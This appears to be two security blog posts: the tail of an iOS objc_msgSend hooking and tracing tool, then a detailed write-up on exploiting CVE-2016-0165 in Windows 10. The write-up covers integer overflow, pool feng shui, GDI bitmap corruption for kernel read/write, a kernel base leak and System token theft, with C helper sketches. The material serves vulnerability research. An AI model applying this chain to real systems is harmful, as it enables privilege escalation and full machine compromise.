Do look through the implementation [4]. I skip over some details that glue things together, but the important bits that I mention should be enough to understand, in great detail, what is happening under the hood.

Interpreting the call

Now that function hooking is done, it is time to level up and interpret the results. This is where we actually implement the objc_trace functionality. So, the patch to objc_msgSend actually redirects execution to one of our functions:

id objc_msgSend_trace(id self, SEL op) {
    __asm__ __volatile__ (
        "stp fp, lr, [sp, #-16]!;\n"
        "mov fp, sp;\n"

        "sub    sp, sp, #(10*8 + 8*16);\n"
        "stp    q0, q1, [sp, #(0*16)];\n"
        "stp    q2, q3, [sp, #(2*16)];\n"
        "stp    q4, q5, [sp, #(4*16)];\n"
        "stp    q6, q7, [sp, #(6*16)];\n"
        "stp    x0, x1, [sp, #(8*16+0*8)];\n"
        "stp    x2, x3, [sp, #(8*16+2*8)];\n"
        "stp    x4, x5, [sp, #(8*16+4*8)];\n"
        "stp    x6, x7, [sp, #(8*16+6*8)];\n"
        "str    x8,     [sp, #(8*16+8*8)];\n"

        "BL _hook_callback64_pre;\n"
        "mov x9, x0;\n"

        // Restore all the parameter registers to the initial state.
        "ldp    q0, q1, [sp, #(0*16)];\n"
        "ldp    q2, q3, [sp, #(2*16)];\n"
        "ldp    q4, q5, [sp, #(4*16)];\n"
        "ldp    q6, q7, [sp, #(6*16)];\n"
        "ldp    x0, x1, [sp, #(8*16+0*8)];\n"
        "ldp    x2, x3, [sp, #(8*16+2*8)];\n"
        "ldp    x4, x5, [sp, #(8*16+4*8)];\n"
        "ldp    x6, x7, [sp, #(8*16+6*8)];\n"
        "ldr    x8,     [sp, #(8*16+8*8)];\n"
        // Restore the stack pointer, frame pointer and link register
        "mov    sp, fp;\n"
        "ldp    fp, lr, [sp], #16;\n"

        "BR x9;\n"       // call the jump page
    );
}

This function stores all calling convention relevant registers on the stack and calls _hook_callback64_pre, a regular C function that can behave as if it were objc_msgSend as it was called. In this function we can read parameters as if they were sent to the method call; this includes the class instance and the selector. Once _hook_callback64_pre returns, our objc_msgSend_trace function restores the registers and branches to the configured jump page, which eventually branches back to the original call.

void* hook_callback64_pre(id self, SEL op, void* a1, void* a2, void* a3, void* a4, void* a5) {
    // get the important bits: class, function
    char* classname = (char*) object_getClassName( self );
    if(classname == NULL) {
        classname = "nil";
    }
    char* opname = (char*) op;
    return original_msgSend;
}

Once we get into the hook_callback64_pre function, things get much simpler since we can use the objc API to do our work. The only trick is the realization that the SEL type is actually a char* which we cast directly. This gives us the full selector. Counting colons will give us the count of parameters the method is expecting. When everything is done the output looks something like this:

iPhone:~ root# DYLD_INSERT_LIBRARIES=libobjc_trace.dylib /Applications/Maps.app/Maps
objc_msgSend function substrated from 0x197967bc0 to 0x10065b730, trampoline 0x100718000
000000009c158310: [NSStringROMKeySet_Embedded alloc ()]
000000009c158310: [NSSharedKeySet initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded initialize ()]
000000009c158310: [NSStringROMKeySet_Embedded init ()]
000000009c158310: [NSStringROMKeySet_Embedded initWithKeys:count: (0x0 0x0 )]
000000009c158310: [NSStringROMKeySet_Embedded setSelect: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setC: (0x1 )]
000000009c158310: [NSStringROMKeySet_Embedded setM: (0xf6a )]
000000009c158310: [NSStringROMKeySet_Embedded setFactor: (0x7b5 )]
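The colon counting mentioned above is a one-loop affair. A minimal sketch, where selector_param_count is a hypothetical helper name and the selector is treated as a plain C string, as described earlier:

```c
#include <assert.h>
#include <stddef.h>

/* Number of parameters a selector string announces: one per colon. */
static size_t selector_param_count(const char *selector) {
    assert(selector != NULL);
    size_t count = 0;
    for (const char *p = selector; *p != '\0'; p++) {
        if (*p == ':') count++;
    }
    return count;
}
```

For the selectors in the trace, initWithKeys:count: yields two parameters, setSelect: yields one, and alloc yields none, which is how many values are printed between the parentheses.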


We modify the objc_msgSend preamble to jump to our hook function. The hook function then does whatever and restores the CPU state. It then jumps into the jump page which executes the possibly modified preamble instructions and jumps back into objc_msgSend to continue execution. We also maintain the original unmodified preamble for restoration when we need to remove the hook. Then we use the parameters that were sent to objc_msgSend to interpret the call and print out which method was called with which parameters.

As you can see using function hooking for making objc_trace is but one use case. But this use case is incredibly useful for blackbox security testing. That is particularly true for initial discovery work of learning about the application.

[1] objc-msg-arm64.s

[2] ARM Reference Manual

[3] ARM Instruction Details

[4] objc_trace.m

MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects

On April 12, 2016 Microsoft released 13 security bulletins.
Let’s talk about how I triggered and exploited CVE-2016-0165, one of the MS16-039 fixes.

Diffing Stage

For MS16-039, Microsoft released a fix for all Windows versions, both 32 and 64 bits.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 and CVE-2016-0167.

Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».


Interestingly, this function has been exported since Windows 10, when «win32k.sys» was split into 3 parts: «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».

If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.

In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.

Summing up, two integer overflows were patched in the same function.


Understanding the fix

If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:

"lea ecx,[rax+rax*2]"

In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).

At the same time, we can see that the structs number is represented by a 64 bit register, but the destination of this calculation is a 32 bit register!

Now that we know it’s an integer overflow, the only thing we need to find out is what number multiplied by 3 gives us a result bigger than 4GB.
The idea is that this result can’t be represented by a 32 bit number.

A simple way to know that is making the next calculation:

(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)

Now, if we multiply this result by 3, we obtain:

 0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes

In the same basic block, two instructions below («shl ecx,4»), we can see that the number «2» obtained previously is shifted left by 4 bits, which is the same as multiplying it by 16, resulting in the 0x20 value.

So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂
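The arithmetic is easy to replay in C. This is only a model of the two instructions discussed above, assuming the count arrives in a 64 bit register and the result is kept in a 32 bit one; alloc_size_32 and alloc_size_64 are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Mimics "lea ecx,[rax+rax*2]" followed by "shl ecx,4": the 64-bit count
   is multiplied by 3, truncated to 32 bits, then multiplied by 16. */
static uint32_t alloc_size_32(uint64_t point_count) {
    uint32_t ecx = (uint32_t)(point_count * 3u);  /* upper 32 bits are lost */
    return ecx << 4;
}

/* The size the same computation would yield without any truncation. */
static uint64_t alloc_size_64(uint64_t point_count) {
    assert(point_count <= UINT64_MAX / 48u);
    return point_count * 48u;
}
```

For 0x55555556 POINT structs, alloc_size_32 gives 0x20 while alloc_size_64 gives 0x1000000020, so the buffer ends up 64GB too small.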

Path to the vulnerability

For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls the vulnerable function directly.


From user space, this function is located in «gdi32.dll» and it’s exported as «PathToRegion».

Triggering the vulnerability

Now that we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability, but is it possible to reach this number of POINTs?

In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo».

Looking at the documentation, we see this definition:

BOOL PolylineTo(
 _In_ HDC hdc,
 _In_ const POINT *lppt,
 _In_ DWORD cCount
);

The second argument is a POINT struct array and the third one is the array size.

It’s easy to think that if we create 0x55555556 structs and then pass these structures as a parameter, we will trigger the vulnerability, but WE WON’T. Let’s see why.

If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».


«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.

If we look at this function, there is a check on the number of POINT structs passed as argument:


The maximum POINTs number that we can pass as parameter is 0x4E2000.

It’s clear that there is not a direct way to reach the wanted number to trigger this vulnerability, so what is the trick ?

Well, after some tests, the answer was pretty simple: «call PolylineTo many times until reaching the wanted number of POINT structs».

And the result was this:


The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.
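How many calls that takes is simple arithmetic, sketched below. The planner is purely illustrative: batch_plan and plan_batches are hypothetical names, it calls no Windows API, and it assumes that a single call may carry up to 0x4E2000 points inclusive and that the points of all calls simply add up, which the text above suggests but the kernel check may treat slightly differently.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical plan: how many calls are needed when each call may add
   at most max_per_call points, and how many points go into the last one. */
typedef struct {
    uint32_t calls;
    uint32_t last_call_points;
} batch_plan;

static batch_plan plan_batches(uint32_t total_points, uint32_t max_per_call) {
    assert(max_per_call > 0);
    batch_plan plan;
    uint32_t full = total_points / max_per_call;   /* calls filled completely */
    uint32_t rest = total_points % max_per_call;   /* points left for one more */
    plan.calls = full + (rest != 0 ? 1u : 0u);
    plan.last_call_points = (rest != 0) ? rest : (full != 0 ? max_per_call : 0u);
    return plan;
}
```

Under those assumptions, reaching 0x55555556 points with batches of at most 0x4E2000 takes 280 calls, the last one carrying 3175766 points.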

PALLOCMEM2 function — «Bonus Track»

Triggering this vulnerability is relatively easy on 64 bit targets like Windows 8, 8.1 and 10.
Now, in «Windows 7» 64 bits, the vulnerability is very difficult to exploit.

Let’s see the vulnerable basic block and the memory allocator function:


The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register like Windows versions mentioned before.

The only feasible way to produce an integer overflow is with the previous instruction:


In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to get a kernel memory exhaustion than allocate this number of structures.

Now, why is Windows 7 different from the latest Windows versions?

Well, if we look at the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».

What is the difference ?

The «PALLOCMEM2» function receives a 32 bit argument size, but the  «__imp_ExAllocatePoolWithTag» function receives a 64 bit argument size.
The argument type defines how the result of the multiplication will be passed to the allocator function; in this case, the result is cast to «unsigned int».

We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now call «PALLOCMEM2» have been exposed to integer overflows that are much easier to exploit.

Analyzing the heap overflow

Once we trigger the integer overflow, we have to understand what the consequences are.

As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».


This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.

It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that would destroy a big part of the Windows kernel heap, which would quickly give us a BSoD.

What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the vulnerable function.

The trick here is that POINT structs are copied only when their coordinates ARE NOT REPEATED.
E.g: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.

Thus, it’s possible to control exactly how many structures will be used by the heap overflow.

Some exploitation considerations

One of the most important things to know before starting to write the exploit is that the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since this is used only temporarily.


It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.

Unfortunately, only some values to be overwritten are totally controlled by us, so, we are not able to overwrite the next chunk header with its original content.

On the other hand, we can think of the alloc/free operation as «atomic», because we don’t regain control of execution until the «PathToRegion» function returns.

So, how is it possible to successfully exploit this vulnerability?

Four years ago I explained something similar in the «The Big Trick Behind Exploit MS12-034» blogpost.

Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.

So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.

Finding the best memory allocator

Considering the above, it’s now necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.


When heap spray requires several interactions, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», making reference to the ancient Chinese technique (https://en.wikipedia.org/wiki/Feng_shui).

The POOL TYPE used by the vulnerable function is 0x21, which according to Microsoft means «NonPagedPoolSession» + «NonPagedPoolExecute».

Knowing this, it’s necessary to find some function that allows us to allocate memory in this pool type with the best possible accuracy.

The best function that I have found to heap spray the pool type 0x21 is the undocumented «ZwUserConvertMemHandle» function, located in «gdi32.dll» and «user32.dll».


When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».

If we look at the «ConvertMemHandle» code, we can see the perfect allocator:


Basically, this function receives 2 parameters, BUFFER and SIZE and returns a HANDLE.

If we look only at the yellow basic blocks, we can see that the «ConvertMemHandle» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk, and it will stay there until it’s freed.
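
To pick the SIZE that yields a chunk of a given total size, the overhead can be worked out as follows. This is only a sketch under stated assumptions: the 0x14 overhead and the 0x10 chunk header come from this post, while the 16-byte rounding is my assumption about 64-bit pool granularity, and «spray_chunk_size» is a name invented for this example.

```c
#include <stdint.h>

#define CONVERTMEMHANDLE_OVERHEAD 0x14u /* extra bytes added to SIZE (from the text) */
#define POOL_HEADER_SIZE          0x10u /* chunk header size (from the text) */
#define POOL_GRANULARITY          0x10u /* assumption: 16-byte granularity on x64 */

/* Hypothetical helper: total pool chunk size (header included) expected
 * when the allocator is called with the given SIZE. */
static uint32_t spray_chunk_size(uint32_t size)
{
    uint32_t body = size + CONVERTMEMHANDLE_OVERHEAD;
    /* Round the body up to the next multiple of the pool granularity. */
    body = (body + POOL_GRANULARITY - 1) & ~(POOL_GRANULARITY - 1);
    return body + POOL_HEADER_SIZE;
}
```

Under these assumptions, a SIZE of 0x3c would produce a 0x60-byte chunk and a SIZE of 0xbcc a 0xbf0-byte chunk.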

To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard».

Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.

Choosing GDI objects to be overwritten

Now that we know how to do a good Heap Feng Shui, we need to find something interesting to corrupt with the heap overflow.

Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.

In that blogpost he described how GDI objects are composed:

typedef struct {
   BASEOBJECT64 BaseObject;
   SURFOBJ64 SurfObj;
} SURFACE64;

As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».

In my case, the problem is that I don’t control all the values written by the heap overflow, so I can’t overwrite this property with a USEFUL ADDRESS.

A variant of abusing GDI object

Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.

After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.

This picture shows the content of the GDI object, before and after the heap overflow:

The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set to 0xFFFFFFFF.
It means that the GDI object now has width=0xFFFFFFFF and height=0x01.

So, we are able to read/write contiguous memory far beyond the original limits of the data pointed to by «SURFOBJ64.pvScan0»!

Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed to by «SURFOBJ64.pvScan0» is contiguous to the object properties.

With all these things, it was time to write an exploit …

Exploitation — Step 1

In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.

So, the new calculation is:

0x55555557 x 3 = 0x1'0000'0005

As the result is truncated to a 32-bit number, we get 0x5, and then this number is multiplied by 16:

0x5 << 4 = 0x50

It means that the «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.

The reason I decided to increase the size by 0x30 bytes is that very small chunk allocations are not always predictable.
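
The calculation above can be reproduced with 32-bit unsigned arithmetic. This is a minimal sketch of the arithmetic only, not the actual kernel code; «vulnerable_alloc_size» is a hypothetical name.

```c
#include <stdint.h>

/* Hypothetical model of the size computation described in the text:
 * the POINT count is multiplied by 3, the result is truncated to 32 bits,
 * and the truncated value is then multiplied by 16. */
static uint32_t vulnerable_alloc_size(uint32_t point_count)
{
    uint32_t tripled = point_count * 3u; /* wraps modulo 2^32 */
    return tripled << 4;                 /* multiply by 16 */
}
```

With 0x55555557 points the function returns 0x50, while 0x55555556 points give 0x20, which is where the 0x30-byte difference comes from.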

Adding the chunk header size (0x10 bytes), the heap spray should look like this:

[Figure: ms16_039-heap-spray-candidate]

Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.

Because of alignment problems between the small chunk used and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.

Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.


Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.
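
The offset calculation can be written down as follows. This is a sketch based on my reading of the numbers in the text: 0x60 is taken to be the small chunk (0x50 bytes plus the 0x10 header) and 0xbf0 the PADDING chunk that opens the next page. The helper names are made up.

```c
#include <stdint.h>

#define SMALL_CHUNK_SIZE   0x60u  /* 0x50 bytes + 0x10 header (from the text) */
#define PADDING_CHUNK_SIZE 0xbf0u /* assumed to be the PADDING chunk */

/* Hypothetical helper: address of the first GDI object chunk that follows
 * the chunk allocated by the vulnerable function. */
static uint64_t first_gdi_chunk_addr(uint64_t allocated_chunk_addr)
{
    return allocated_chunk_addr + SMALL_CHUNK_SIZE + PADDING_CHUNK_SIZE;
}

/* Offset of an address inside its 4KB page. */
static uint32_t page_offset(uint64_t addr)
{
    return (uint32_t)(addr & 0xFFFu);
}
```

If the allocated chunk sits at page offset 0xfa0, which is the last 0x60 bytes of the page, the GDI object chunk lands at offset 0xbf0 of the following page.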

Exploitation — Step 1.5

Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.

As the heap spray uses a big number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.

Looking at the «CreateBitmap» function prototype:

HBITMAP CreateBitmap(
 _In_ int nWidth,
 _In_ int nHeight,
 _In_ UINT cPlanes,
 _In_ UINT cBitsPerPel,
 _In_ const VOID *lpvBits
);

As an example, we could create a GDI object like this:

CreateBitmap (100, 100, 1, 32, lpvBits);

Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits per pixel), it will fail, unless this object has been overwritten afterwards.

So, the way to detect which GDI object has been modified is to check which one behaves differently than expected.
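
The detection loop can be sketched as below. To keep the example runnable anywhere, «GetBitmapBits» is replaced by a mock that follows the behavior described in this post (a request bigger than the bitmap fails and returns 0). The struct, the mock and the helper names are all assumptions made for illustration, and row padding is ignored.

```c
#include <stddef.h>
#include <stdint.h>

/* Mock of the size fields the kernel would consult (hypothetical type). */
typedef struct {
    uint32_t cx, cy; /* current sizlBitmap values */
    uint32_t bpp;    /* bits per pixel */
} MockBitmap;

/* Mock of GetBitmapBits as described in the text: returns the number of
 * bytes read, or 0 when the request exceeds the bitmap size. */
static long mock_get_bitmap_bits(const MockBitmap *bm, long cb)
{
    uint64_t limit = (uint64_t)bm->cx * bm->cy * (bm->bpp / 8);
    if (cb <= 0 || (uint64_t)cb > limit)
        return 0;
    return cb;
}

/* Returns the index of the first object that lets us read past its
 * original size, or -1 if none has been overwritten. */
static long find_overwritten(const MockBitmap *objs, size_t count,
                             long original_bytes)
{
    for (size_t i = 0; i < count; i++) {
        if (mock_get_bitmap_bits(&objs[i], original_bytes + 1) > original_bytes)
            return (long)i;
    }
    return -1;
}
```

In a real exploit the loop would run over the sprayed HBITMAP array and call «GetBitmapBits» directly; the comparison against the original size stays the same.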

Exploitation — Step 2

Now that we can read/write beyond the GDI object limits, we can use this new ability to overwrite a second GDI object and thus get an arbitrary write.

Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after the first one.


So, if from the first GDI object we are able to write to the contiguous memory, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.

Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.

Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.

It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.
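
The read, patch and write-back sequence can be sketched like this. It is a hedged illustration only: the buffer is assumed to have been filled by «GetBitmapBits» on the first GDI object, the offset of «pvScan0» inside that buffer is build-specific and therefore passed in as a parameter, and «patch_pvscan0» is a made-up name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: given the bytes read between both GDI objects,
 * replace only the 8-byte pvScan0 field of the second object and leave
 * every other byte untouched, so the buffer can be written back as is. */
static void patch_pvscan0(uint8_t *gap, size_t gap_len,
                          size_t pvscan0_off, uint64_t target_addr)
{
    assert(gap != NULL);
    assert(pvscan0_off + sizeof target_addr <= gap_len);
    memcpy(gap + pvscan0_off, &target_addr, sizeof target_addr);
}
```

After patching, the whole buffer would be written back with «SetBitmapBits» on the first object, and the second object would then be used to read or write at «target_addr».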

On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.

Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.

Exploitation — Final Stage

Once we get a kernel read/write primitive, we could say that the last step is pretty simple.

The idea is to steal the «System» process token and set it to our process (exploit.exe).

As this attack is launched from «Low Integrity Level», it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so we have to take the long way.

The EPROCESS list is a linked list, where every element is an EPROCESS struct that contains information about a unique running process, including its TOKEN.

This list is pointed to by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we can get the «PsInitialSystemProcess» kernel address, and then perform the famous TOKEN KIDNAPPING.
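
A walk over the EPROCESS list followed by the token copy could look like the sketch below. Several things here are assumptions: the read/write primitives are abstracted as function pointers, the EPROCESS field offsets are build-specific and not given in this post, so they are passed in as parameters, and a small fake memory array is included only so the logic can be exercised outside the kernel.

```c
#include <stdint.h>

/* Read/write primitives, e.g. built on GetBitmapBits/SetBitmapBits. */
typedef uint64_t (*read64_fn)(uint64_t addr);
typedef void (*write64_fn)(uint64_t addr, uint64_t value);

/* Build-specific EPROCESS field offsets (hypothetical container). */
typedef struct {
    uint64_t pid;   /* UniqueProcessId */
    uint64_t links; /* ActiveProcessLinks */
    uint64_t token; /* Token */
} EprocessOffsets;

/* Walk the circular list starting at the System EPROCESS. Returns the
 * EPROCESS with the given PID, or 0 if the walk wraps or hits max_steps. */
static uint64_t find_eprocess(read64_fn rd, const EprocessOffsets *o,
                              uint64_t system_eprocess, uint64_t pid,
                              unsigned max_steps)
{
    uint64_t cur = system_eprocess;
    for (unsigned i = 0; i < max_steps; i++) {
        if (rd(cur + o->pid) == pid)
            return cur;
        /* Flink points at the next entry's ActiveProcessLinks field. */
        cur = rd(cur + o->links) - o->links;
        if (cur == system_eprocess)
            break;
    }
    return 0;
}

/* Copy the System token value into our own EPROCESS. */
static void steal_token(read64_fn rd, write64_fn wr, const EprocessOffsets *o,
                        uint64_t system_eprocess, uint64_t our_eprocess)
{
    wr(our_eprocess + o->token, rd(system_eprocess + o->token));
}

/* Tiny fake "kernel memory" used only to try the sketch off-target. */
static uint64_t fake_mem[64];
static uint64_t fake_read64(uint64_t addr) { return fake_mem[addr / 8]; }
static void fake_write64(uint64_t addr, uint64_t v) { fake_mem[addr / 8] = v; }
```

On a real target, «system_eprocess» would be the value read from the «PsInitialSystemProcess» address, and the PID to look for would be the one returned by «GetCurrentProcessId».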

The best way I know of to leak a Windows kernel address is by using the «sidt» instruction, which can be executed from user mode.
This instruction returns the size and address of the operating system’s interrupt descriptor table (IDT), located in kernel space.

Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.
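
Decoding the «sidt» result and an IDT entry could be sketched as follows. The byte layouts used here are the standard x86-64 ones (a 10-byte limit/base pair, and 16-byte gate descriptors with the handler offset split in three parts); the function and type names are invented for this example, and the raw bytes are assumed to have been obtained with «sidt» and with the read primitive respectively.

```c
#include <stdint.h>

/* Assemble n little-endian bytes into an integer. */
static uint64_t le_bytes(const uint8_t *p, unsigned n)
{
    uint64_t v = 0;
    for (unsigned i = 0; i < n; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Decoded form of the 10-byte operand stored by sidt in 64-bit mode. */
typedef struct {
    uint16_t limit; /* table size in bytes, minus one */
    uint64_t base;  /* kernel address of the table */
} Idtr;

static Idtr parse_idtr(const uint8_t raw[10])
{
    Idtr r;
    r.limit = (uint16_t)le_bytes(raw, 2);
    r.base = le_bytes(raw + 2, 8);
    return r;
}

/* Rebuild the handler address from one 16-byte gate descriptor:
 * bits 0-15 at bytes 0-1, bits 16-31 at bytes 6-7, bits 32-63 at bytes 8-11. */
static uint64_t idt_handler_address(const uint8_t entry[16])
{
    uint64_t low = le_bytes(entry, 2);
    uint64_t mid = le_bytes(entry + 6, 2);
    uint64_t high = le_bytes(entry + 8, 4);
    return low | (mid << 16) | (high << 32);
}
```

The address returned by «idt_handler_address» is the starting point for the backwards search described next.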

The next step is to read «ntoskrnl.exe» memory backwards from that address until we find the well-known «MZ» signature, which marks the base address of «ntoskrnl.exe».
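
The backwards search can be sketched like this. It assumes that the image base is page aligned, so only the first two bytes of each 4KB page are checked, and it bounds the number of pages visited. The read primitive is abstracted as a function pointer, and the fake image exists only to make the sketch testable; all names are hypothetical.

```c
#include <stdint.h>

#define SCAN_PAGE_SIZE 0x1000ull
#define MZ_SIGNATURE   0x5A4Du /* 'M','Z' read as a little-endian 16-bit value */

typedef uint16_t (*read16_fn)(uint64_t addr);

/* Starting from an address inside the image, step back one page at a time
 * until the MZ signature is found. Returns 0 if max_pages is exhausted. */
static uint64_t find_image_base(read16_fn rd, uint64_t addr_inside_image,
                                unsigned max_pages)
{
    uint64_t page = addr_inside_image & ~(SCAN_PAGE_SIZE - 1);
    for (unsigned i = 0; i < max_pages; i++, page -= SCAN_PAGE_SIZE) {
        if (rd(page) == MZ_SIGNATURE)
            return page;
    }
    return 0;
}

/* Fake image used only to exercise the sketch off-target. */
#define FAKE_BASE 0xFFFFF80000000000ull
static uint8_t fake_image[4 * 0x1000];

static uint16_t fake_read16(uint64_t addr)
{
    if (addr < FAKE_BASE || addr - FAKE_BASE + 1 >= sizeof fake_image)
        return 0;
    uint64_t off = addr - FAKE_BASE;
    return (uint16_t)(fake_image[off] | (fake_image[off + 1] << 8));
}
```

On a real target, «rd» would be backed by the kernel read primitive obtained in Step 2.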

Once we get the Windows kernel base, we only need to know the «PsInitialSystemProcess» kernel address.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.
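
The relocation from the user-mode copy to the kernel address is a single subtraction and addition. A minimal sketch, where «kernel_symbol_address» is a made-up name and the two user-mode values are assumed to come from «LoadLibrary» and «GetProcAddress» as described above:

```c
#include <stdint.h>

/* Hypothetical helper: translate a symbol address found in the user-mode
 * mapping of ntoskrnl.exe into its address in the running kernel. */
static uint64_t kernel_symbol_address(uint64_t kernel_base,
                                      uint64_t user_image_base,
                                      uint64_t user_symbol_addr)
{
    uint64_t relative_offset = user_symbol_addr - user_image_base;
    return kernel_base + relative_offset;
}
```

Reading 8 bytes at the resulting address with the kernel read primitive gives the EPROCESS of the «System» process.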

As a result of what I explained before, I obtained this:


Final notes

It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.

However, it’s interesting to see how 64-bit «Windows 10» can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all the kernel exploit mitigations implemented so far.